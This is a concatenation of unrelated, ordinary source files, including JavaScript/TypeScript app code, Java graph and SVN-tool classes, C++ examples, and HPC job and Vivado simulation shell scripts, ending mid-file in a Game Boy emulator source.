errors.push('Please include a hackathon location.');
}
if (!hackathon.name || hackathon.name.trim().length <= 0) {
errors.push('Please include a hackathon name.');
}
if (!hackathon.description || hackathon.description.trim().length <= 0) {
errors.push('Please include a hackathon description.');
}
return {
isSuccessful: errors.length > 0 ? false : true,
errors
};
}
module.exports = {
validateHackathon
};
|
<filename>dynatrace_utils.js
'use strict';
/* jshint node: true */
var sa = require('superagent');
function DynatraceUtils(tenant, token) {
this.dtTentant = tenant;
this.apiToken = token;
}
DynatraceUtils.prototype.getLoad = function(host, startTime, endTime, done) {
var url = this.dtTentant + '/api/v1/timeseries';
sa.post(url)
.set('authorization', this.apiToken)
.set('Content-Type', 'application/json')
.send({
startTimestamp: startTime
})
.send({
endTimestamp: endTime
})
.send({
queryMode: "total"
})
.send({
timeseriesId: "com.dynatrace.builtin:host.nic.bytessent"
})
.send({
aggregationType: "SUM"
})
.send({
entities: [host]
})
.end(function(error, resp) {
if (error) {
done(error, resp);
} else {
var key = Object.keys(resp.body.result.dataPoints)[0];
var load = resp.body.result.dataPoints[key][0][1];
done(null, load);
}
});
};
DynatraceUtils.prototype.addComment = function(problemId, comment, done) {
var url = this.dtTentant + '/api/v1/problem/details/' + problemId + '/comments';
sa.post(url)
.set('authorization', this.apiToken)
.set('Content-Type', 'application/json')
.send(comment)
.end(function(error, resp) {
done(error, resp);
});
};
module.exports = DynatraceUtils; |
#include<iostream>
using namespace std;
int sumArray(int arr[], int n)
{
int sum = 0;
for (int i=0; i<n; i++)
sum += arr[i];
return sum;
}
int main()
{
int arr[] = {2, 3, 4, 5, 6};
int n = sizeof(arr)/sizeof(arr[0]);
cout << "Sum of the array is: " << sumArray(arr, n);
return 0;
} |
import * as PIXI from "pixi.js";
import { Ground } from "./ground/ground";
import { GameObject } from "./abstract/game-object";
export class World {
private static instance: World = new World();
stage: PIXI.Container;
ground: Ground;
gameObjects: GameObject[];
private background: PIXI.Sprite;
constructor() {
if (World.instance) {
throw new Error("Error: Instantiation failed: Use World.getInstance() instead of new.");
}
World.instance = this;
this.gameObjects = [];
}
public static getInstance(): World {
return World.instance;
}
public static setBackground(backgroundTexture: PIXI.Texture): any {
if (!this.WorldInstance.background) {
this.WorldInstance.background = new PIXI.Sprite(backgroundTexture);
this.WorldInstance.stage.addChildAt(this.WorldInstance.background, 0);
} else {
this.WorldInstance.background.texture = backgroundTexture;
}
}
public static isObjectOnGround(gameObject: GameObject) {
if (gameObject.y >= World.getInstance().ground.y) {
return true;
}
return false;
}
public static addObjectToWorld(gameObject: GameObject) {
this.WorldInstance.gameObjects.push(gameObject);
this.WorldInstance.stage.addChild(gameObject);
}
private static get WorldInstance() {
return World.getInstance();
}
}
|
import React, { useState, useEffect, useRef, useCallback } from "react";
import {
TouchableWithoutFeedback,
View,
StyleSheet,
Dimensions,
Animated,
} from "react-native";
import { MaterialIcons } from "@expo/vector-icons";
const DoubleClick = (props) => {
const delayTime = props.delay ? props.delay : 300;
const [firstPress, setFirstPress] = useState(true);
const [lastTime, setLastTime] = useState(new Date());
const [modalVisible, setModalVisible] = useState(false);
let timer = false;
const fadeAnim = useRef(new Animated.Value(0)).current;
const timeout = props.timeout ? props.timeout : 1000;
useEffect(() => {
if (modalVisible) {
fadeIn();
setTimeout(() => {
fadeOut();
}, timeout);
setModalVisible(false);
}
}, [fadeIn, fadeOut, modalVisible]);
useEffect(() => {
if (timer) clearTimeout(timer);
}, [timer]);
const onPress = () => {
const now = new Date().getTime();
if (firstPress) {
setFirstPress(false);
timer = setTimeout(() => {
setFirstPress(true);
}, delayTime);
setLastTime(now);
} else if (now - lastTime < delayTime) {
setModalVisible(true);
if (timer) clearTimeout(timer);
props.doubleClick();
setFirstPress(true);
}
};
const fadeIn = useCallback(() => {
Animated.timing(fadeAnim, {
toValue: 1,
duration: 250,
}).start();
}, [fadeAnim]);
const fadeOut = useCallback(() => {
Animated.timing(fadeAnim, {
toValue: 0,
duration: 250,
}).start();
}, [fadeAnim]);
return (
<TouchableWithoutFeedback onPress={onPress}>
<View>
{props.icon && (
<Animated.View
style={{
opacity: fadeAnim,
...styles.favoriteIcon,
}}
>
<MaterialIcons
name="favorite"
size={props.size ? props.size : 120}
color={props.color ? props.color : "rgba(255, 102, 102, 0.88)"}
/>
</Animated.View>
)}
{props.children}
</View>
</TouchableWithoutFeedback>
);
};
const styles = StyleSheet.create({
favoriteIcon: {
position: "absolute",
zIndex: 10,
marginTop: Dimensions.get("window").width * 0.5 - 60,
alignSelf: "center",
justifyContent: "center",
alignItems: "center",
},
});
export default DoubleClick;
|
#!/bin/bash
cd /home/nlpserver/zzilong/kaldi/egs/supermarket-product
. ./path.sh
( echo '#' Running on `hostname`
echo '#' Started at `date`
echo -n '# '; cat <<EOF
nnet-shuffle-egs --buffer-size=5000 --srand=47 ark:exp/nnet4a/egs/egs.${SGE_TASK_ID}.2.ark ark:- | nnet-train-parallel --num-threads=8 --minibatch-size=128 --srand=47 exp/nnet4a/47.mdl ark:- exp/nnet4a/48.${SGE_TASK_ID}.mdl
EOF
) >exp/nnet4a/log/train.47.$SGE_TASK_ID.log
time1=`date +"%s"`
( nnet-shuffle-egs --buffer-size=5000 --srand=47 ark:exp/nnet4a/egs/egs.${SGE_TASK_ID}.2.ark ark:- | nnet-train-parallel --num-threads=8 --minibatch-size=128 --srand=47 exp/nnet4a/47.mdl ark:- exp/nnet4a/48.${SGE_TASK_ID}.mdl ) 2>>exp/nnet4a/log/train.47.$SGE_TASK_ID.log >>exp/nnet4a/log/train.47.$SGE_TASK_ID.log
ret=$?
time2=`date +"%s"`
echo '#' Accounting: time=$(($time2-$time1)) threads=1 >>exp/nnet4a/log/train.47.$SGE_TASK_ID.log
echo '#' Finished at `date` with status $ret >>exp/nnet4a/log/train.47.$SGE_TASK_ID.log
[ $ret -eq 137 ] && exit 100;
touch exp/nnet4a/q/done.12592.$SGE_TASK_ID
exit $[$ret ? 1 : 0]
## submitted with:
# qsub -v PATH -cwd -S /bin/bash -j y -l arch=*64* -o exp/nnet4a/q/train.47.log -l mem_free=10G,ram_free=2G,arch=*64 -l mem_free=1G,ram_free=1G -pe smp 4 -t 1:8 /home/nlpserver/zzilong/kaldi/egs/supermarket-product/exp/nnet4a/q/train.47.sh >>exp/nnet4a/q/train.47.log 2>&1
|
import React, { useEffect, useState, useRef } from 'react'
import { NavigationContainer } from '@react-navigation/native'
import { createStackNavigator } from '@react-navigation/stack'
import { StyleSheet, Text, View } from 'react-native'
import DrawerNavigator from './navigation/DrawerNavigator'
import { firebase } from './firebase/config'
import { decode, encode } from 'base-64'
import LoginScreen from './screens/Login'
import RegistrationScreen from './screens/Register'
if (!global.btoa) {
global.btoa = encode
}
if (!global.atob) {
global.atob = decode
}
const Stack = createStackNavigator()
const App = () => {
const [loading, setLoading] = useState(false)
const [user, setUser] = useState(null)
const logOut = () => {
setLoading(true)
firebase
.auth()
.signOut()
.then(() => {
setUser(null)
})
.catch((error) => alert(error))
.finally(() => setLoading(false))
}
const handleAuthChange = () => {
setLoading(true)
firebase.auth().onAuthStateChanged((user) => {
if (!user) {
setLoading(false)
return
}
setUserData(user)
})
}
const setUserData = (user) => {
setLoading(true)
firebase
.firestore()
.collection('users')
.doc(user.uid)
.get()
.then((document) => {
let userData = document.data()
if (!userData) {
userData = {
email: user.email,
fullName: user.displayName,
id: user.uid,
}
}
setUser(userData)
})
.catch((error) => {
alert(error)
})
.finally(() => {
setLoading(false)
})
}
useEffect(() => {
handleAuthChange()
}, [])
if (loading) {
return (
<View style={styles.container}>
<Text>Loading...</Text>
</View>
)
}
return (
<NavigationContainer>
<Stack.Navigator
screenOptions={{
headerShown: false,
}}
>
{user && (
<Stack.Screen name="Main">
{(props) => <DrawerNavigator {...props} logOut={logOut} />}
</Stack.Screen>
)}
<Stack.Screen name="Login" component={LoginScreen} />
<Stack.Screen name="Registration" component={RegistrationScreen} />
</Stack.Navigator>
</NavigationContainer>
)
}
const styles = StyleSheet.create({
container: {
flex: 1,
backgroundColor: '#fff',
alignItems: 'center',
justifyContent: 'center',
},
})
export default App
|
#!/bin/bash -f
#*********************************************************************************************************
# Vivado (TM) v2019.2 (64-bit)
#
# Filename : data_mem_256x32.sh
# Simulator : Mentor Graphics Questa Advanced Simulator
# Description : Simulation script for compiling, elaborating and verifying the project source files.
# The script will automatically create the design libraries sub-directories in the run
# directory, add the library logical mappings in the simulator setup file, create default
# 'do/prj' file, execute compilation, elaboration and simulation steps.
#
# Generated by Vivado on Wed Jun 03 21:15:35 +0800 2020
# SW Build 2708876 on Wed Nov 6 21:40:23 MST 2019
#
# Copyright 1986-2019 Xilinx, Inc. All Rights Reserved.
#
# usage: data_mem_256x32.sh [-help]
# usage: data_mem_256x32.sh [-lib_map_path]
# usage: data_mem_256x32.sh [-noclean_files]
# usage: data_mem_256x32.sh [-reset_run]
#
# Prerequisite:- To compile and run simulation, you must compile the Xilinx simulation libraries using the
# 'compile_simlib' TCL command. For more information about this command, run 'compile_simlib -help' in the
# Vivado Tcl Shell. Once the libraries have been compiled successfully, specify the -lib_map_path switch
# that points to these libraries and rerun export_simulation. For more information about this switch please
# type 'export_simulation -help' in the Tcl shell.
#
# You can also point to the simulation libraries by either replacing the <SPECIFY_COMPILED_LIB_PATH> in this
# script with the compiled library directory path or specify this path with the '-lib_map_path' switch when
# executing this script. Please type 'data_mem_256x32.sh -help' for more information.
#
# Additional references - 'Xilinx Vivado Design Suite User Guide:Logic simulation (UG900)'
#
#*********************************************************************************************************
# Script info
echo -e "data_mem_256x32.sh - Script generated by export_simulation (Vivado v2019.2 (64-bit)-id)\n"
# Main steps
run()
{
check_args $# $1
setup $1 $2
compile
elaborate
simulate
}
# RUN_STEP: <compile>
compile()
{
# Compile design files
source compile.do 2>&1 | tee -a compile.log
}
# RUN_STEP: <elaborate>
elaborate()
{
source elaborate.do 2>&1 | tee -a elaborate.log
}
# RUN_STEP: <simulate>
simulate()
{
vsim -64 -c -do "do {simulate.do}" -l simulate.log
}
# STEP: setup
setup()
{
case $1 in
"-lib_map_path" )
if [[ ($2 == "") ]]; then
echo -e "ERROR: Simulation library directory path not specified (type \"./data_mem_256x32.sh -help\" for more information)\n"
exit 1
fi
copy_setup_file $2
;;
"-reset_run" )
reset_run
echo -e "INFO: Simulation run files deleted.\n"
exit 0
;;
"-noclean_files" )
# do not remove previous data
;;
* )
copy_setup_file $2
esac
create_lib_dir
# Add any setup/initialization commands here:-
# <user specific commands>
}
# Copy modelsim.ini file
copy_setup_file()
{
file="modelsim.ini"
if [[ ($1 != "") ]]; then
lib_map_path="$1"
else
lib_map_path="D:/VivadoProject/COD/Lab5/cpu_pipeline_branch_in_ex/cpu_pipeline_branch_in_ex.cache/compile_simlib/questa"
fi
if [[ ($lib_map_path != "") ]]; then
src_file="$lib_map_path/$file"
cp $src_file .
fi
}
# Create design library directory
create_lib_dir()
{
lib_dir="questa_lib"
if [[ -e $lib_dir ]]; then
rm -rf $lib_dir
fi
mkdir $lib_dir
}
# Delete generated data from the previous run
reset_run()
{
files_to_remove=(compile.log elaborate.log simulate.log vsim.wlf questa_lib)
for (( i=0; i<${#files_to_remove[*]}; i++ )); do
file="${files_to_remove[i]}"
if [[ -e $file ]]; then
rm -rf $file
fi
done
create_lib_dir
}
# Check command line arguments
check_args()
{
if [[ ($1 == 1 ) && ($2 != "-lib_map_path" && $2 != "-noclean_files" && $2 != "-reset_run" && $2 != "-help" && $2 != "-h") ]]; then
echo -e "ERROR: Unknown option specified '$2' (type \"./data_mem_256x32.sh -help\" for more information)\n"
exit 1
fi
if [[ ($2 == "-help" || $2 == "-h") ]]; then
usage
fi
}
# Script usage
usage()
{
msg="Usage: data_mem_256x32.sh [-help]\n\
Usage: data_mem_256x32.sh [-lib_map_path]\n\
Usage: data_mem_256x32.sh [-reset_run]\n\
Usage: data_mem_256x32.sh [-noclean_files]\n\n\
[-help] -- Print help information for this script\n\n\
[-lib_map_path <path>] -- Compiled simulation library directory path. The simulation library is compiled\n\
using the compile_simlib tcl command. Please see 'compile_simlib -help' for more information.\n\n\
[-reset_run] -- Recreate simulator setup files and library mappings for a clean run. The generated files\n\
from the previous run will be removed. If you don't want to remove the simulator generated files, use the\n\
-noclean_files switch.\n\n\
[-noclean_files] -- Reset previous run, but do not remove simulator generated files from the previous run.\n\n"
echo -e $msg
exit 1
}
# Launch script
run $1 $2
|
// http://web.eecs.utk.edu/~huangj/cs360/360/notes/Setjmp/lecture.html
#include <csignal>
#include <sys/types.h> // for kill
#include <unistd.h> // getpid, alarm
#include <iostream>
using namespace std;
int inner, outer;
time_t tStart;
void signal_handler(int sig)
{
if(sig == SIGALRM) {
time_t tElapsed;
tElapsed = time(0) - tStart;
cout << tElapsed << " second" << (tElapsed == 1? "": "s");
cout << ": outer loop = " << outer << "/10000, inner loop = " << inner << "/1000000\n";
if (tElapsed >= 4) {
cout <<"signal_handler says \"Die! Die! Die!\" (sending kill signal)\n";
kill(getpid(), SIGKILL);
}
alarm(1);
signal(SIGALRM, signal_handler);
}
}
int main(int argc, char**argv)
{
signal(SIGALRM, signal_handler);
alarm(1);
tStart = time(0);
for (outer = 0; outer < 10000; outer++) {
for (inner = 0; inner < 1000000; inner++);
}
}
|
#!/usr/bin/env bash
#SBATCH --job-name="pegasus_FScuffDiff"
#SBATCH --time=0-240:00:00
#SBATCH --mail-user=jetstream@tgen.org
#SBATCH --mail-type=FAIL
time=`date +%d-%m-%Y-%H-%M`
beginTime=`date +%s`
machine=`hostname`
echo "### NODE: $machine"
echo "### REF: ${REF}"
echo "### DIRNAME: ${DIRNAME}"
echo "### RUNDIR: ${RUNDIR}"
echo "### CDPATH: ${CUFFDIFFPATH}"
echo "### GTF: ${GTF}"
echo "### MASK: ${MASK}"
echo "### NXT1: ${NXT1}"
echo "### BAM1: ${BAM1}"
echo "### BAM2: ${BAM2}"
echo "TIME:$time starting cuffdiff on ${BAM1} and ${BAM2}"
echo "running first stranded cufflinks options for this RNA"
cd ${DIRNAME}
newName=`basename ${DIRNAME}`
newName=${newName/_cdDir/}
BAM1=`sed "s/\s/,/g" <(echo $BAM1)`
BAM2=`sed "s/\s/,/g" <(echo $BAM2)`
${CUFFDIFFPATH}/cuffdiff -p 16 -N -M ${MASK} -b ${REF} --library-type fr-secondstrand -L Control,Tumor ${GTF} ${BAM1} ${BAM2}
if [ $? -eq 0 ] ; then
mv ${DIRNAME}/tss_groups.fpkm_tracking ${DIRNAME}/${newName}_tss_groups.fpkm_tracking
mv ${DIRNAME}/isoforms.fpkm_tracking ${DIRNAME}/${newName}_isoforms.fpkm_tracking
mv ${DIRNAME}/genes.fpkm_tracking ${DIRNAME}/${newName}_genes.fpkm_tracking
mv ${DIRNAME}/cds.fpkm_tracking ${DIRNAME}/${newName}_cds.fpkm_tracking
mv ${DIRNAME}/tss_group_exp.diff ${DIRNAME}/${newName}_tss_group_exp.diff
mv ${DIRNAME}/splicing.diff ${DIRNAME}/${newName}_splicing.diff
mv ${DIRNAME}/promoters.diff ${DIRNAME}/${newName}_promoters.diff
mv ${DIRNAME}/isoform_exp.diff ${DIRNAME}/${newName}_isoform_exp.diff
mv ${DIRNAME}/gene_exp.diff ${DIRNAME}/${newName}_gene_exp.diff
mv ${DIRNAME}/cds_exp.diff ${DIRNAME}/${newName}_cds_exp.diff
mv ${DIRNAME}/cds.diff ${DIRNAME}/${newName}_cds.diff
mv ${DIRNAME}/isoforms.count_tracking ${DIRNAME}/${newName}_isoforms.count_tracking
mv ${DIRNAME}/tss_groups.count_tracking ${DIRNAME}/${newName}_tss_groups.count_tracking
mv ${DIRNAME}/cds.count_tracking ${DIRNAME}/${newName}_cds.count_tracking
mv ${DIRNAME}/genes.count_tracking ${DIRNAME}/${newName}_genes.count_tracking
mv ${DIRNAME}/isoforms.read_group_tracking ${DIRNAME}/${newName}_isoforms.read_group_tracking
mv ${DIRNAME}/tss_groups.read_group_tracking ${DIRNAME}/${newName}_tss_groups.read_group_tracking
mv ${DIRNAME}/cds.read_group_tracking ${DIRNAME}/${newName}_cds.read_group_tracking
mv ${DIRNAME}/genes.read_group_tracking ${DIRNAME}/${newName}_genes.read_group_tracking
mv ${DIRNAME}/read_groups.info ${DIRNAME}/${newName}_read_groups.info
mv ${DIRNAME}/run.info ${DIRNAME}/${newName}_run.info
echo "starting 3 external scripts"
${PROCESSCDLISTPATH}/processCuffDiffLists.sh ${DIRNAME}/${newName}_genes.fpkm_tracking ${DIRNAME}/${newName}_gene_exp.diff
${PROCESSCDLISTPATH}/processCuffDiffLists.sh ${DIRNAME}/${newName}_isoforms.fpkm_tracking ${DIRNAME}/${newName}_isoform_exp.diff
${CUFFDIFF2VCFPATH}/cuffdiff2vcf.pl ${DIRNAME}/${newName}_gene_exp.diff ${BAM1}
echo "done with 3 external scripts"
touch ${DIRNAME}.cuffDiffPass
else
touch ${DIRNAME}.cuffDiffFail
fi
rm -f ${DIRNAME}.cuffDiffInQueue
endTime=`date +%s`
elapsed=$(( $endTime - $beginTime ))
(( hours=$elapsed/3600 ))
(( mins=$elapsed%3600/60 ))
echo "RUNTIME:CUFFDIFF:$hours:$mins" > ${DIRNAME}.cuffdiff.totalTime
time=`date +%d-%m-%Y-%H-%M`
echo "TIME:$time finished cuffdiff on ${BAM1} and ${BAM2}"
|
export default class Image {
url!: string;
width: number | null = null;
constructor(jsonObj?: Image | null, url?: string) {
if (jsonObj) {
this.url = jsonObj.url;
this.width = jsonObj.width;
}
if (url) this.url = url;
}
}
|
<filename>src/features/tradeHistory/redux/__tests__/helpers-tests.ts
import uuid from 'uuid';
import * as R from 'ramda';
import { ITrade, ISocketServerTrade } from 'shared/types/models';
import moment from 'services/moment';
import { makeDescendDateSortChecker } from 'shared/helpers/test';
import { applyTradesDiff, equalById } from '../helpers';
const trade: ITrade = {
exchangeRate: 0.1,
amount: 0.3,
date: '2018-10-01T20:56:05.866796Z',
id: uuid(),
market: 'zrx_tiox',
type: 'sell'
};
const socketServerTrade: ISocketServerTrade = {
executionPrice: 0.2,
amount: 0.4,
tradeTime: '2018-10-01T20:57:05.866796Z',
tradeId: uuid(),
instrument: 'zrx_tiox',
side: 2
};
describe('applyTradesDiff helper', () => {
test('Apply new uniq (by id) trades', () => {
expect(
applyTradesDiff([{ ...socketServerTrade, tradeId: uuid() }], [{ ...trade, id: uuid() }])
).toHaveLength(2);
});
test('Apply not uniq (by id) trades', () => {
const notUniqId = uuid();
expect(
applyTradesDiff([{ ...socketServerTrade, tradeId: notUniqId }], [{ ...trade, id: notUniqId }])
).toHaveLength(1);
});
test('Apply new empty trades to previous', () => {
expect(applyTradesDiff([], [{ ...trade }])).toHaveLength(1);
});
test('Apply trades to empty previous', () => {
expect(applyTradesDiff([{ ...socketServerTrade }], [])).toHaveLength(1);
});
test('Apply empty to empty', () => {
expect(applyTradesDiff([], [])).toHaveLength(0);
});
test('Check equality by id', () => {
expect(equalById({ ...trade }, { ...trade })).toBe(true);
});
test('Should be descend sorted by date', () => {
const prevTrades: ITrade[] = R.range(0, 10).map(x => {
return {
...trade,
id: uuid(),
date: moment(trade.date).add((Math.random() * 10).toFixed(0), 'd').toISOString(),
};
});
const result = applyTradesDiff([], prevTrades);
const descendDateSortChecker = makeDescendDateSortChecker<ITrade>('date');
const isSortedCorrectly = result.every(descendDateSortChecker);
expect(isSortedCorrectly).toBe(true);
});
test('Result should no more than 100 items length', () => {
const serverTrades: ISocketServerTrade[] = R.range(0, 103).map(() => ({ ...socketServerTrade, tradeId: uuid() }));
expect(applyTradesDiff(serverTrades, [])).toHaveLength(100);
});
});
|
import re
def detect_grammar_mistakes(sentence):
corrected_sentence = re.sub(r"[tT]he pacient","the patient", sentence)
return corrected_sentence
sentence = "The doctor advise the pacient to take medicine."
print(detect_grammar_mistakes(sentence)) |
/*
* (C) Copyright 2003-2018, by <NAME> and Contributors.
*
* JGraphT : a free Java graph-theory library
*
* This program and the accompanying materials are dual-licensed under
* either
*
* (a) the terms of the GNU Lesser General Public License version 2.1
* as published by the Free Software Foundation, or (at your option) any
* later version.
*
* or (per the licensee's choosing)
*
* (b) the terms of the Eclipse Public License v1.0 as published by
* the Eclipse Foundation.
*/
package org.jgrapht.graph;
import org.jgrapht.*;
import org.jgrapht.graph.builder.*;
/**
* A simple graph. A simple graph is an undirected graph for which at most one edge connects any two
* vertices, and loops are not permitted. If you're unsure about simple graphs, see:
* <a href="http://mathworld.wolfram.com/SimpleGraph.html">
* http://mathworld.wolfram.com/SimpleGraph.html</a>.
*
* @param <V> the graph vertex type
* @param <E> the graph edge type
*
*/
public class SimpleGraph<V, E>
extends AbstractBaseGraph<V, E>
{
private static final long serialVersionUID = 4607246833824317836L;
/**
* Creates a new simple graph with the specified edge factory.
*
* @param weighted if true the graph supports edge weights
* @param ef the edge factory of the new graph.
*/
public SimpleGraph(EdgeFactory<V, E> ef, boolean weighted)
{
super(ef, false, false, false, weighted);
}
/**
* Creates a new simple graph with the specified edge factory.
*
* @param ef the edge factory of the new graph.
*/
public SimpleGraph(EdgeFactory<V, E> ef)
{
this(ef, false);
}
/**
* Creates a new simple graph.
*
* @param edgeClass class on which to base factory for edges
*/
public SimpleGraph(Class<? extends E> edgeClass)
{
this(new ClassBasedEdgeFactory<>(edgeClass));
}
/**
* Create a builder for this kind of graph.
*
* @param edgeClass class on which to base factory for edges
* @param <V> the graph vertex type
* @param <E> the graph edge type
* @return a builder for this kind of graph
*/
public static <V, E> GraphBuilder<V, E, ? extends SimpleGraph<V, E>> createBuilder(
Class<? extends E> edgeClass)
{
return new GraphBuilder<>(new SimpleGraph<>(edgeClass));
}
/**
* Create a builder for this kind of graph.
*
* @param ef the edge factory of the new graph
* @param <V> the graph vertex type
* @param <E> the graph edge type
* @return a builder for this kind of graph
*/
public static <V,
E> GraphBuilder<V, E, ? extends SimpleGraph<V, E>> createBuilder(EdgeFactory<V, E> ef)
{
return new GraphBuilder<>(new SimpleGraph<>(ef));
}
}
// End SimpleGraph.java
|
<reponame>lgoldstein/communitychest
/*
*
*/
package net.community.apps.tools.svn.svnsync;
import javax.swing.SwingUtilities;
import net.community.apps.tools.svn.SVNBaseMain;
import net.community.apps.tools.svn.svnsync.resources.ResourcesAnchor;
import net.community.chest.CoVariantReturn;
import net.community.chest.dom.proxy.AbstractXmlProxyConverter;
import net.community.chest.lang.SysPropsEnum;
import net.community.chest.resources.SystemPropertiesResolver;
/**
* <P>Copyright as per GPLv2</P>
* @author <NAME>.
* @since Aug 19, 2010 11:31:15 AM
*
*/
public final class Main extends SVNBaseMain<ResourcesAnchor,SVNSyncMainFrame> {
public Main (String... args)
{
super(args);
}
/*
* @see net.community.apps.tools.svn.SVNBaseMain#processArgument(net.community.apps.tools.svn.SVNBaseMainFrame, java.lang.String, int, int, java.lang.String[])
*/
@Override
protected int processArgument (SVNSyncMainFrame f, String a, int oIndex, int numArgs, String... args)
{
int aIndex=oIndex;
if ("-t".equals(a) || "--target".equals(a))
{
aIndex++;
final String loc=resolveStringArg(a, args, numArgs, aIndex, f.getWCLocation()),
eff=SystemPropertiesResolver.SYSTEM.format(loc);
f.setWCLocation(null, eff, false);
}
else if ("-s".equals(a) || "--source".equals(a))
{
aIndex++;
final String loc=resolveStringArg(a, args, numArgs, aIndex, f.getSynchronizationSource()),
eff=SystemPropertiesResolver.SYSTEM.format(loc);
f.setSynchronizationSource(eff);
}
else if ("-c".equals(a) || "--confirm".equals(a))
{
aIndex++;
final String loc=resolveStringArg(a, args, numArgs, aIndex, null);
if (!f.addConfirmLocation(loc))
throw new IllegalStateException("Re-specified " + a + " value: " + loc);
}
else if ("--show-skipped".equals(a))
{
f.setShowSkippedTargetsEnabled(true);
}
else if ("--skip-props".equals(a))
{
f.setPropertiesSyncAllowed(false);
}
else if ("--use-merge".equals(a))
{
f.setUseMergeForUpdate(true);
}
else
aIndex = super.processArgument(f, a, oIndex, numArgs, args);
return aIndex;
}
/*
* @see net.community.apps.common.BaseMain#createMainFrameInstance()
*/
@Override
@CoVariantReturn
protected SVNSyncMainFrame createMainFrameInstance () throws Exception
{
final SVNSyncMainFrame f=processMainArgs(new SVNSyncMainFrame(), getMainArguments());
final String wcLoc=f.getSynchronizationSource();
if ((wcLoc == null) || (wcLoc.length() <= 0))
f.setSynchronizationSource(SysPropsEnum.USERDIR.getPropertyValue());
return f;
}
//////////////////////////////////////////////////////////////////////////
public static void main (final String[] args)
{
// 1st thing we do before any UI startup
AbstractXmlProxyConverter.setDefaultLoader(ResourcesAnchor.getInstance());
SwingUtilities.invokeLater(new Main(args));
}
}
|
<reponame>luisitbweb/html<gh_stars>1-10
var map;
var directionsDisplay;
var directionsService = new google.maps.DirectionsService();
function initialize() {
directionsDisplay = new google.maps.DirectionsRenderer(); // Instanciando...
var latlng = new google.maps.LatLng(-23.5874156, -46.63351890000001);
var options = {
zoom: 15,
center: latlng,
mapTypeId: google.maps.MapTypeId.ROADMAP
};
map = new google.maps.Map(document.getElementById("rota_mapa"), options);
directionsDisplay.setMap(map);
directionsDisplay.setPanel(document.getElementById("trajeto_texto")); // Aqui faço a definição
}
initialize();
$("form").submit(function(event) {
event.preventDefault();
var enderecoPartida = $("#endereco_partida").val();
if(enderecoPartida.length == 8 && isNaN(enderecoPartida) == false){
var cep_ini = enderecoPartida.slice(0,5);
var cep_fim = enderecoPartida.slice(5,8);
var enderecoPartida = cep_ini+"-"+cep_fim;
}
var enderecoChegada = "Rua Vergueiro, 3057 - Vila Mariana, São Paulo - SP, 04101-300, Brazil";
var request = { // Novo objeto google.maps.DirectionsRequest, contendo:
origin: enderecoPartida, // origem
destination: enderecoChegada, // destino
travelMode: google.maps.TravelMode.DRIVING // meio de transporte, nesse caso, de carro
};
directionsService.route(request, function(result, status) {
if (status == google.maps.DirectionsStatus.OK) { // Se deu tudo certo
directionsDisplay.setDirections(result); // Renderizamos no mapa o resultado
document.getElementById("trajeto_texto").style.display = "block";
}else{
alert('Rota não encontrada. \nTente um novo CEP ou Endereço.');
initialize();
document.getElementById("trajeto_texto").style.display = "none";
}
});
}); |
<gh_stars>0
const mongoose = require('mongoose');
var Schema = mongoose.Schema;
const commentSchema = new mongoose.Schema({
user:String,
realuser:{type:Schema.Types.ObjectId, ref:'User'},
list:{type:Schema.Types.ObjectId, ref:'List'},
username:String,
date:{type:Date, default:Date.now },
description:String,
upvote:{ type: Number, default: 1 },
downvote:{ type: Number, default: 1 },
});
const Comment = mongoose.model('Comment', commentSchema);
module.exports = Comment;
|
var classarmnn_1_1profiling_1_1_i_send_thread =
[
[ "~ISendThread", "classarmnn_1_1profiling_1_1_i_send_thread.xhtml#a4e0fb8f587a0f5ef84d28e57cd2b6afe", null ],
[ "Start", "classarmnn_1_1profiling_1_1_i_send_thread.xhtml#ae9429e2efd9a811c148c6b56b635567c", null ],
[ "Stop", "classarmnn_1_1profiling_1_1_i_send_thread.xhtml#a7c6c2c7d1aeec305dcae4bc901b0bdca", null ]
]; |
#! /bin/bash
set -e
if [ -n "$PBS_JOBNAME" ]
then
if [ -f "${PBS_O_HOME}/.bashrc" ]
then
source "${PBS_O_HOME}/.bashrc"
fi
cd /gpfs01/home/tcm0036/codiv-sanger-bake-off/scripts/simcoevolity-scripts
else
cd "$( dirname "\${BASH_SOURCE[0]}" )"
fi
project_dir="../.."
exe_path="${project_dir}/bin/simcoevolity"
if [ ! -x "$exe_path" ]
then
echo "ERROR: No executable '${exe_path}'."
echo " You probably need to run the project setup script."
exit 1
fi
source "${project_dir}/modules-to-load.sh" >/dev/null 2>&1 || echo " No modules loaded"
if [ ! -f "${project_dir}/pyenv/bin/activate" ]
then
echo "ERROR: Python environment \"${project_dir}/pyenv\" does not exist."
echo " You probably need to run the project setup script."
exit 1
fi
source "${project_dir}/pyenv/bin/activate"
rng_seed=816640044
number_of_reps=20
locus_size=500
config_path="../../configs/fixed-independent-pairs-05-sites-01000.yml"
prior_config_path="../../configs/pairs-05-sites-01000.yml"
output_dir="../../simulations/fixed-independent-pairs-05-sites-01000-locus-500/batch-816640044"
qsub_set_up_script_path="../set_up_ecoevolity_qsubs.py"
mkdir -p "$output_dir"
"$exe_path" --seed="$rng_seed" -n "$number_of_reps" -p "$prior_config_path" -l "$locus_size" -o "$output_dir" "$config_path" && "$qsub_set_up_script_path" "$output_dir"
|
#!/bin/bash
#SBATCH --account=def-dkulic
#SBATCH --mem=8000M # memory per node
#SBATCH --time=23:00:00 # time (DD-HH:MM)
#SBATCH --output=/project/6001934/lingheng/Double_DDPG_Job_output/continuous_RoboschoolAtlasForwardWalk-v1_ddpg_softcopy_epsilon_greedy_seed5_run9_%N-%j.out # %N for node name, %j for jobID
module load qt/5.9.6 python/3.6.3 nixpkgs/16.09 gcc/7.3.0 boost/1.68.0 cuda cudnn
source ~/tf_cpu/bin/activate
python ./ddpg_discrete_action.py --env RoboschoolAtlasForwardWalk-v1 --random-seed 5 --exploration-strategy epsilon_greedy --summary-dir ../Double_DDPG_Results_no_monitor/continuous/RoboschoolAtlasForwardWalk-v1/ddpg_softcopy_epsilon_greedy_seed5_run9 --continuous-act-space-flag --double-ddpg-flag
|
<reponame>c-sp/AGE<gh_stars>1-10
//
// Copyright 2021 <NAME>
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
#include "age_gb_oam_dma.hpp"
namespace
{
bool is_work_ram_dma_source(int oam_dma_src_address)
{
return (oam_dma_src_address >= 0xC000) && (oam_dma_src_address < 0xE000);
